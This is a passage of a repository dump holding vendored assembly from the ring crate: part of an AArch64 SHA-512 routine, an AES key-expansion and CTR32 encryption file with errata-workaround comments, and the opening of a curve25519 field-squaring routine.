.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v25.2d,v25.2d,v23.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08217 //sha512su0 v23.16b,v16.16b
ext v7.16b,v19.16b,v20.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678ad7 //sha512su1 v23.16b,v22.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v24.2d,v24.2d,v16.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08230 //sha512su0 v16.16b,v17.16b
ext v7.16b,v20.16b,v21.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678af0 //sha512su1 v16.16b,v23.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v25.2d,v25.2d,v17.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08251 //sha512su0 v17.16b,v18.16b
ext v7.16b,v21.16b,v22.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678a11 //sha512su1 v17.16b,v16.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v24.2d,v24.2d,v18.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08272 //sha512su0 v18.16b,v19.16b
ext v7.16b,v22.16b,v23.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678a32 //sha512su1 v18.16b,v17.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v25.2d,v25.2d,v19.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08293 //sha512su0 v19.16b,v20.16b
ext v7.16b,v23.16b,v16.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678a53 //sha512su1 v19.16b,v18.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v24.2d,v24.2d,v20.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082b4 //sha512su0 v20.16b,v21.16b
ext v7.16b,v16.16b,v17.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678a74 //sha512su1 v20.16b,v19.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v25.2d,v25.2d,v21.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec082d5 //sha512su0 v21.16b,v22.16b
ext v7.16b,v17.16b,v18.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678a95 //sha512su1 v21.16b,v20.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v24.2d,v24.2d,v22.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082f6 //sha512su0 v22.16b,v23.16b
ext v7.16b,v18.16b,v19.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678ab6 //sha512su1 v22.16b,v21.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v25.2d,v25.2d,v23.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08217 //sha512su0 v23.16b,v16.16b
ext v7.16b,v19.16b,v20.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678ad7 //sha512su1 v23.16b,v22.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v24.2d,v24.2d,v16.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08230 //sha512su0 v16.16b,v17.16b
ext v7.16b,v20.16b,v21.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678af0 //sha512su1 v16.16b,v23.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v25.2d,v25.2d,v17.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08251 //sha512su0 v17.16b,v18.16b
ext v7.16b,v21.16b,v22.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678a11 //sha512su1 v17.16b,v16.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v24.2d,v24.2d,v18.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec08272 //sha512su0 v18.16b,v19.16b
ext v7.16b,v22.16b,v23.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678a32 //sha512su1 v18.16b,v17.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
add v25.2d,v25.2d,v19.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08293 //sha512su0 v19.16b,v20.16b
ext v7.16b,v23.16b,v16.16b,#8
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
.long 0xce678a53 //sha512su1 v19.16b,v18.16b,v7.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
add v24.2d,v24.2d,v20.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082b4 //sha512su0 v20.16b,v21.16b
ext v7.16b,v16.16b,v17.16b,#8
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
.long 0xce678a74 //sha512su1 v20.16b,v19.16b,v7.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
add v25.2d,v25.2d,v21.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec082d5 //sha512su0 v21.16b,v22.16b
ext v7.16b,v17.16b,v18.16b,#8
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
.long 0xce678a95 //sha512su1 v21.16b,v20.16b,v7.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v24.2d,v24.2d,v22.2d
ld1 {v25.2d},[x3],#16
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v24.2d // "T1 + H + K512[i]"
.long 0xcec082f6 //sha512su0 v22.16b,v23.16b
ext v7.16b,v18.16b,v19.16b,#8
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
.long 0xce678ab6 //sha512su1 v22.16b,v21.16b,v7.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
add v25.2d,v25.2d,v23.2d
ld1 {v24.2d},[x3],#16
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v25.2d // "T1 + H + K512[i]"
.long 0xcec08217 //sha512su0 v23.16b,v16.16b
ext v7.16b,v19.16b,v20.16b,#8
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
.long 0xce678ad7 //sha512su1 v23.16b,v22.16b,v7.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
ld1 {v25.2d},[x3],#16
add v24.2d,v24.2d,v16.2d
ld1 {v16.16b},[x1],#16 // load next input
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v24.2d // "T1 + H + K512[i]"
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
rev64 v16.16b,v16.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
ld1 {v24.2d},[x3],#16
add v25.2d,v25.2d,v17.2d
ld1 {v17.16b},[x1],#16 // load next input
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v25.2d // "T1 + H + K512[i]"
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
rev64 v17.16b,v17.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
ld1 {v25.2d},[x3],#16
add v24.2d,v24.2d,v18.2d
ld1 {v18.16b},[x1],#16 // load next input
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v24.2d // "T1 + H + K512[i]"
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
rev64 v18.16b,v18.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
ld1 {v24.2d},[x3],#16
add v25.2d,v25.2d,v19.2d
ld1 {v19.16b},[x1],#16 // load next input
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v25.2d // "T1 + H + K512[i]"
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
rev64 v19.16b,v19.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
ld1 {v25.2d},[x3],#16
add v24.2d,v24.2d,v20.2d
ld1 {v20.16b},[x1],#16 // load next input
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v24.2d // "T1 + H + K512[i]"
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
rev64 v20.16b,v20.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
ld1 {v24.2d},[x3],#16
add v25.2d,v25.2d,v21.2d
ld1 {v21.16b},[x1],#16 // load next input
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v25.2d // "T1 + H + K512[i]"
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
rev64 v21.16b,v21.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
ld1 {v25.2d},[x3],#16
add v24.2d,v24.2d,v22.2d
ld1 {v22.16b},[x1],#16 // load next input
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v24.2d // "T1 + H + K512[i]"
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
rev64 v22.16b,v22.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
sub x3,x3,#80*8 // rewind
add v25.2d,v25.2d,v23.2d
ld1 {v23.16b},[x1],#16 // load next input
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v25.2d // "T1 + H + K512[i]"
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
rev64 v23.16b,v23.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v0.2d,v0.2d,v26.2d // accumulate
add v1.2d,v1.2d,v27.2d
add v2.2d,v2.2d,v28.2d
add v3.2d,v3.2d,v29.2d
cbnz x2,Loop_hw
st1 {v0.2d,v1.2d,v2.2d,v3.2d},[x0] // store context
ldr x29,[sp],#16
ret
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__APPLE__)
|
mi2bjss/Pressel-site | 7,660 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/aesv8-armx-win64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(_WIN32)
#if __ARM_MAX_ARCH__>=7
.text
.arch armv8-a+crypto
.section .rodata
.align 5
Lrcon:
.long 0x01,0x01,0x01,0x01
.long 0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d // rotate-n-splat
.long 0x1b,0x1b,0x1b,0x1b
.text
.globl aes_hw_set_encrypt_key
.def aes_hw_set_encrypt_key
.type 32
.endef
.align 5
aes_hw_set_encrypt_key:
Lenc_key:
// Armv8.3-A PAuth: even though x30 is pushed to the stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
mov x3,#-2
cmp w1,#128
b.lt Lenc_key_abort
cmp w1,#256
b.gt Lenc_key_abort
tst w1,#0x3f
b.ne Lenc_key_abort
adrp x3,Lrcon
add x3,x3,:lo12:Lrcon
cmp w1,#192
eor v0.16b,v0.16b,v0.16b
ld1 {v3.16b},[x0],#16
mov w1,#8 // reuse w1
ld1 {v1.4s,v2.4s},[x3],#32
b.lt Loop128
// 192-bit key support was removed.
b L256
.align 4
Loop128:
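// Key-expansion trick used in this loop: tbl with the rotate-and-splat
// mask in v2 broadcasts RotWord of the last key word into every lane,
// and aese against the all-zero v0 then applies SubBytes (ShiftRows is
// a no-op when all four words are equal), computing SubWord(RotWord(w))
// in two instructions; v1 supplies the round constant, doubled by shl.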
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
subs w1,w1,#1
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
b.ne Loop128
ld1 {v1.4s},[x3]
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
eor v3.16b,v3.16b,v6.16b
st1 {v3.4s},[x2]
add x2,x2,#0x50
mov w12,#10
b Ldone
// 192-bit key support was removed.
.align 4
L256:
ld1 {v4.16b},[x0]
mov w1,#7
mov w12,#14
st1 {v3.4s},[x2],#16
Loop256:
tbl v6.16b,{v4.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v4.4s},[x2],#16
aese v6.16b,v0.16b
subs w1,w1,#1
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
st1 {v3.4s},[x2],#16
b.eq Ldone
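// AES-256 only: every second derived key word applies SubWord without
// the RotWord rotation, hence the plain splat of the last word below.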
dup v6.4s,v3.s[3] // just splat
ext v5.16b,v0.16b,v4.16b,#12
aese v6.16b,v0.16b
eor v4.16b,v4.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v4.16b,v4.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v4.16b,v4.16b,v5.16b
eor v4.16b,v4.16b,v6.16b
b Loop256
Ldone:
str w12,[x2] // store the round count (10 or 14) at byte offset 240
mov x3,#0
Lenc_key_abort:
mov x0,x3 // return value
ldr x29,[sp],#16
ret
.globl aes_hw_ctr32_encrypt_blocks
.def aes_hw_ctr32_encrypt_blocks
.type 32
.endef
.align 5
aes_hw_ctr32_encrypt_blocks:
// Armv8.3-A PAuth: even though x30 is pushed to the stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
ldr w5,[x3,#240] // number of rounds, stored at byte offset 240 of the key schedule
ldr w8, [x4, #12]
ld1 {v0.4s},[x4]
ld1 {v16.4s,v17.4s},[x3] // load key schedule...
sub w5,w5,#4
mov x12,#16
cmp x2,#2
add x7,x3,x5,lsl#4 // pointer to last 5 round keys
sub w5,w5,#2
ld1 {v20.4s,v21.4s},[x7],#32
ld1 {v22.4s,v23.4s},[x7],#32
ld1 {v7.4s},[x7]
add x7,x3,#32
mov w6,w5
csel x12,xzr,x12,lo
// ARM Cortex-A57 and Cortex-A72 cores running in 32-bit mode are
// affected by silicon errata #1742098 [0] and #1655431 [1],
// respectively, where the second instruction of an aese/aesmc
// instruction pair may execute twice if an interrupt is taken right
// after the first instruction consumes an input register of which a
// single 32-bit lane has been updated the last time it was modified.
//
// This function uses a counter in one 32-bit lane. The lane-insert mov
// lines could write to v1.16b and v18.16b directly, but that trips these bugs.
// We write to v6.16b and copy to the final register as a workaround.
//
// [0] ARM-EPM-049219 v23 Cortex-A57 MPCore Software Developers Errata Notice
// [1] ARM-EPM-012079 v11.0 Cortex-A72 MPCore Software Developers Errata Notice
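//
// Illustrative shape of the workaround (comments only):
//     mov v1.s[3], w10            // direct partial-lane write: unsafe here
// becomes
//     orr v6.16b, v0.16b, v0.16b  // stage a full copy in v6
//     mov v6.s[3], w10            // partial-lane write lands on v6
//     orr v1.16b, v6.16b, v6.16b  // whole-register copy avoids the hazard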
#ifndef __AARCH64EB__
rev w8, w8
#endif
add w10, w8, #1
orr v6.16b,v0.16b,v0.16b
rev w10, w10
mov v6.s[3],w10
add w8, w8, #2
orr v1.16b,v6.16b,v6.16b
b.ls Lctr32_tail
rev w12, w8
mov v6.s[3],w12
sub x2,x2,#3 // bias
orr v18.16b,v6.16b,v6.16b
b Loop3x_ctr32
.align 4
Loop3x_ctr32:
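// Three counter blocks (v0, v1, v18) are kept in flight so that the
// aese/aesmc pairs of different blocks can overlap in the pipeline;
// a remainder of one or two blocks is finished at Lctr32_tail.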
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
aese v18.16b,v16.16b
aesmc v18.16b,v18.16b
ld1 {v16.4s},[x7],#16
subs w6,w6,#2
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
aese v18.16b,v17.16b
aesmc v18.16b,v18.16b
ld1 {v17.4s},[x7],#16
b.gt Loop3x_ctr32
aese v0.16b,v16.16b
aesmc v4.16b,v0.16b
aese v1.16b,v16.16b
aesmc v5.16b,v1.16b
ld1 {v2.16b},[x0],#16
add w9,w8,#1
aese v18.16b,v16.16b
aesmc v18.16b,v18.16b
ld1 {v3.16b},[x0],#16
rev w9,w9
aese v4.16b,v17.16b
aesmc v4.16b,v4.16b
aese v5.16b,v17.16b
aesmc v5.16b,v5.16b
ld1 {v19.16b},[x0],#16
mov x7,x3
aese v18.16b,v17.16b
aesmc v17.16b,v18.16b
aese v4.16b,v20.16b
aesmc v4.16b,v4.16b
aese v5.16b,v20.16b
aesmc v5.16b,v5.16b
eor v2.16b,v2.16b,v7.16b
add w10,w8,#2
aese v17.16b,v20.16b
aesmc v17.16b,v17.16b
eor v3.16b,v3.16b,v7.16b
add w8,w8,#3
aese v4.16b,v21.16b
aesmc v4.16b,v4.16b
aese v5.16b,v21.16b
aesmc v5.16b,v5.16b
// Note the logic to update v0.16b, v1.16b, and v18.16b is written to work
// around a bug in ARM Cortex-A57 and Cortex-A72 cores running in
// 32-bit mode. See the comment above.
eor v19.16b,v19.16b,v7.16b
mov v6.s[3], w9
aese v17.16b,v21.16b
aesmc v17.16b,v17.16b
orr v0.16b,v6.16b,v6.16b
rev w10,w10
aese v4.16b,v22.16b
aesmc v4.16b,v4.16b
mov v6.s[3], w10
rev w12,w8
aese v5.16b,v22.16b
aesmc v5.16b,v5.16b
orr v1.16b,v6.16b,v6.16b
mov v6.s[3], w12
aese v17.16b,v22.16b
aesmc v17.16b,v17.16b
orr v18.16b,v6.16b,v6.16b
subs x2,x2,#3
aese v4.16b,v23.16b
aese v5.16b,v23.16b
aese v17.16b,v23.16b
eor v2.16b,v2.16b,v4.16b
ld1 {v16.4s},[x7],#16 // re-pre-load rndkey[0]
st1 {v2.16b},[x1],#16
eor v3.16b,v3.16b,v5.16b
mov w6,w5
st1 {v3.16b},[x1],#16
eor v19.16b,v19.16b,v17.16b
ld1 {v17.4s},[x7],#16 // re-pre-load rndkey[1]
st1 {v19.16b},[x1],#16
b.hs Loop3x_ctr32
adds x2,x2,#3
b.eq Lctr32_done
cmp x2,#1
mov x12,#16
csel x12,xzr,x12,eq
Lctr32_tail:
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
ld1 {v16.4s},[x7],#16
subs w6,w6,#2
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
ld1 {v17.4s},[x7],#16
b.gt Lctr32_tail
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
ld1 {v2.16b},[x0],x12
aese v0.16b,v20.16b
aesmc v0.16b,v0.16b
aese v1.16b,v20.16b
aesmc v1.16b,v1.16b
ld1 {v3.16b},[x0]
aese v0.16b,v21.16b
aesmc v0.16b,v0.16b
aese v1.16b,v21.16b
aesmc v1.16b,v1.16b
eor v2.16b,v2.16b,v7.16b
aese v0.16b,v22.16b
aesmc v0.16b,v0.16b
aese v1.16b,v22.16b
aesmc v1.16b,v1.16b
eor v3.16b,v3.16b,v7.16b
aese v0.16b,v23.16b
aese v1.16b,v23.16b
cmp x2,#1
eor v2.16b,v2.16b,v0.16b
eor v3.16b,v3.16b,v1.16b
st1 {v2.16b},[x1],#16
b.eq Lctr32_done
st1 {v3.16b},[x1]
Lctr32_done:
ldr x29,[sp],#16
ret
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(_WIN32)
|
mi2bjss/Pressel-site | 2,659 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/third_party/fiat/asm/fiat_curve25519_adx_square.S | #include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86_64) && \
(defined(__APPLE__) || defined(__ELF__))
.intel_syntax noprefix
.text
#if defined(__APPLE__)
.private_extern _fiat_curve25519_adx_square
.global _fiat_curve25519_adx_square
_fiat_curve25519_adx_square:
#else
.type fiat_curve25519_adx_square, @function
.hidden fiat_curve25519_adx_square
.global fiat_curve25519_adx_square
fiat_curve25519_adx_square:
#endif
.cfi_startproc
_CET_ENDBR
push rbp
.cfi_adjust_cfa_offset 8
.cfi_offset rbp, -16
mov rbp, rsp
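/* Orientation note (inferred from the code rather than stated by it):
   rsi points at four 64-bit limbs of a curve25519 field element and
   rdi at the four-limb result. Partial products accumulate on the two
   independent ADX carry chains (adcx/adox), and the upper 256 bits are
   folded back using 2^256 mod (2^255 - 19) = 38 = 0x26, the multiplier
   loaded into rdx for the final mulx steps. */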
mov rdx, [ rsi + 0x0 ]
mulx r10, rax, [ rsi + 0x8 ]
mov rdx, [ rsi + 0x0 ]
mulx rcx, r11, [ rsi + 0x10 ]
xor rdx, rdx
adox r11, r10
mov rdx, [ rsi + 0x0 ]
mulx r9, r8, [ rsi + 0x18 ]
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x80 ], rbx
.cfi_offset rbx, -16-0x80
mulx rbx, r10, [ rsi + 0x18 ]
adox r8, rcx
mov [ rsp - 0x48 ], rdi
adox r10, r9
adcx rax, rax
mov rdx, [ rsi + 0x10 ]
mulx r9, rcx, [ rsi + 0x18 ]
adox rcx, rbx
mov rdx, [ rsi + 0x10 ]
mulx rdi, rbx, [ rsi + 0x8 ]
mov rdx, 0x0
adox r9, rdx
mov [ rsp - 0x70 ], r12
.cfi_offset r12, -16-0x70
mov r12, -0x3
inc r12
adox rbx, r8
adox rdi, r10
adcx r11, r11
mov r8, rdx
adox r8, rcx
mov r10, rdx
adox r10, r9
adcx rbx, rbx
mov rdx, [ rsi + 0x0 ]
mulx r9, rcx, rdx
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x68 ], r13
.cfi_offset r13, -16-0x68
mov [ rsp - 0x60 ], r14
.cfi_offset r14, -16-0x60
mulx r14, r13, rdx
seto dl
inc r12
adox r9, rax
adox r13, r11
adox r14, rbx
adcx rdi, rdi
mov al, dl
mov rdx, [ rsi + 0x10 ]
mulx rbx, r11, rdx
adox r11, rdi
adcx r8, r8
adox rbx, r8
adcx r10, r10
movzx rdx, al
mov rdi, 0x0
adcx rdx, rdi
movzx r8, al
lea r8, [ r8 + rdx ]
mov rdx, [ rsi + 0x18 ]
mulx rdi, rax, rdx
adox rax, r10
mov rdx, 0x26
mov [ rsp - 0x58 ], r15
.cfi_offset r15, -16-0x58
mulx r15, r10, r11
clc
adcx r10, rcx
mulx r11, rcx, rbx
adox r8, rdi
mulx rdi, rbx, r8
inc r12
adox rcx, r9
